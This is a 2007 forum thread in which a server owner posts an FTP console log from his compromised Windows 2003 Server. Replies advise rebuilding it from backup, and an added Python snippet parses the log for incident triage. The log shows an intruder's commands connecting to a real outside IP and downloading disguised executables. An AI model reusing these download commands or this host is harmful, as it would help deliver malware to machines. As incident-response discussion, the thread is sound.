Backdoor Trojan?

Posted by JN on March 2, 2007, 11:12 am
On the screen of my Windows 2003 Server, I found two DOS screens with the
information below:

It looks like somebody got access to it and downloaded some files. I have
unplugged that server from the internet.

What should I do next?

Thanks.

JN

ftp> open 70.52.54.95 13190

Connected to 70.52.54.95.

220 ROO HoneyPot POSTEDIN

ftp> user 1 1

230 Logged in

ftp> get wmupdate80585.exe

200 PORT Command success

150 Opening BINARY mode connection



ftp> open 70.52.54.95 13190

Connected to 70.52.54.95.

220 ROO HoneyPot POSTEDIN

ftp> user 1 1

331 Pass required

230 Logged in

ftp> get wmupdat48382.exe

200 PORT Command success

150 Opening BINARY mode connection





Posted by Malke on March 2, 2007, 1:33 pm
JN wrote:
> On the screen of my Windows 2003 Server, I found two DOS screens with the
> information below:
>
> It looks like somebody got access to it and downloaded some files. I have
> unplugged that server from the internet.
>
> What should I do next?
>
> Thanks.
>
> JN
>
> ftp> open 70.52.54.95 13190
>
> Connected to 70.52.54.95.
>
> 220 ROO HoneyPot POSTEDIN
>
> ftp> user 1 1
>
> 230 Logged in
>
> ftp> get wmupdate80585.exe
>
> 200 PORT Command success
>
> 150 Opening BINARY mode connection
>
>
>
> ftp> open 70.52.54.95 13190
>
> Connected to 70.52.54.95.
>
> 220 ROO HoneyPot POSTEDIN
>
> ftp> user 1 1
>
> 331 Pass required
>
> 230 Logged in
>
> ftp> get wmupdat48382.exe
>
> 200 PORT Command success
>
> 150 Opening BINARY mode connection

What should you do next? You want the real, honest answer? Flatten that
server and apply your backup image. At the same time, you need to figure
out where your security fell down and fix that.


Malke
--
Elephant Boy Computers
www.elephantboycomputers.com
"Don't Panic!"
MS-MVP Windows - Shell/User

Posted by David H. Lipman on March 2, 2007, 4:57 pm

| JN wrote:
>> On the screen of my Windows 2003 Server, I found two DOS screens with the
>> information below:
>>
>> It looks like somebody got access to it and downloaded some files. I have
>> unplugged that server from the internet.
>>
>> What should I do next?
>>
>> Thanks.
>>
>> JN
>>

< snip >

|
| What should you do next? You want the real, honest answer? Flatten that
| server and apply your backup image. At the same time, you need to figure
| out where your security fell down and fix that.
|
| Malke

Since this is a server, not a workstation, I am in 100% agreement with Malke.

When the server is recreated, you need to protect it better!


--
Dave
http://www.claymania.com/removal-trojan-adware.html
http://www.ik-cs.com/got-a-virus.htm
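
Before the rebuild, the two console windows are the main record of what was fetched and from where. The sketch below is an added example, not part of the thread: it parses the second session JN posted into host, port, login, banner and file names, then lists leads for firewall-log and file-system review. The function names and the extension list are assumptions.

```python
import re

# Second session exactly as posted in the thread (blank lines dropped).
TRANSCRIPT = """\
ftp> open 70.52.54.95 13190
Connected to 70.52.54.95.
220 ROO HoneyPot POSTEDIN
ftp> user 1 1
331 Pass required
230 Logged in
ftp> get wmupdat48382.exe
200 PORT Command success
150 Opening BINARY mode connection
"""

EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs")  # assumed list of types to flag

def parse_sessions(text):
    """One record per 'open' command in an ftp client console transcript."""
    sessions = []
    for line in (raw.strip() for raw in text.splitlines()):
        cmd = re.match(r"ftp>\s*(\w+)\s*(.*)", line)
        verb, arg = (cmd[1].lower(), cmd[2].split()) if cmd else (None, [])
        if verb == "open" and arg:
            sessions.append({"host": arg[0], "port": int(arg[1]) if len(arg) > 1 else 21,
                             "user": None, "banner": None, "files": [], "active_mode": False})
        elif not sessions:
            continue  # nothing to attach to before the first 'open'
        elif verb == "user" and arg:
            sessions[-1]["user"] = arg[0]
        elif verb in ("get", "recv") and arg:
            sessions[-1]["files"].append(arg[0])  # first argument is the remote file name
        elif line.startswith("220") and sessions[-1]["banner"] is None:
            sessions[-1]["banner"] = line[3:].strip(" -")
        elif re.match(r"200\s+PORT\b", line, re.I):
            sessions[-1]["active_mode"] = True  # server opens the data connection back to us
    return sessions

def findings(s):
    """Triage notes for one session: leads for log review, not verdicts."""
    notes = []
    if s["port"] != 21:
        notes.append(f"FTP control connection to non-standard port {s['port']}")
    notes += [f"executable retrieved: {f}" for f in s["files"] if f.lower().endswith(EXEC_EXT)]
    if s["active_mode"]:
        notes.append("active-mode (PORT) transfer: look for the server's inbound data connection")
    return notes
```

The host, port and file names it returns are the values to search for in firewall logs and on the restored image.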


